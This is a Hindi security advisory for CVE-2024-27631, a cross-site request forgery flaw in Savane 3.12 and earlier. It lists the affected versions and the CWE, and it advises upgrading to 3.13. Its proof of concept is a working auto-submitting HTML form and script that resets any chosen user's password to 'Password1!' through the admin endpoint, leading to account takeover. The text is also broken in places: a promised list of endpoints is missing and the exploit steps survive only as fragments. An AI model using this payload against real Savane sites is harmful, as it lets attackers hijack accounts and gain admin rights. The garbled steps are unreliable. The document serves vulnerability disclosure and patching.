
CVE-2024–27631 संदर्भ
Savane v3.12 और उससे पहले के संस्करणों में, प्रशासनिक कार्यों पर CSRF सुरक्षा की कमी के कारण विशेषाधिकार वृद्धि और/या खाता अधिग्रहण हो सकता है। विशेष रूप से, एंडपॉइंट /siteadmin/usergroup.php में अन्य उपयोगकर्ताओं के पासवर्ड और प्रशासनिक फ़्लैग बदलने की कार्यक्षमता शामिल है, जो हमलावर को प्रभावी रूप से स्वयं को व्यवस्थापक बनाने की अनुमति देती है।
CSRF के प्रति संवेदनशील अन्य उल्लेखनीय एंडपॉइंट्स में शामिल हैं:
CWE वर्गीकरण: CWE-352: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
रिपोर्टकर्ता: Ally Petitt
प्रभावित उत्पाद: Savane
प्रभावित संस्करण: 3.12 और उससे पहले के
यह किसी अन्य उपयोगकर्ता के खाते का पासवर्ड बदलने के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) है, जो खाता अधिग्रहण का एक मार्ग है।
/users/<username>) से उनका userID नोट करें।<savane_instance> को उपयुक्त डोमेन नाम/होस्ट पते से बदलें।<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1! के साथ पीड़ित खाते में लॉग इन करें।ध्यान दें कि यह PoC स्क्रिप्ट Firefox v103.0 (64-bit) पर परीक्षण की गई थी।
Savane संस्करण 3.13 या उच्चतर में अपग्रेड करें। पैच यहाँ पाया जा सकता है।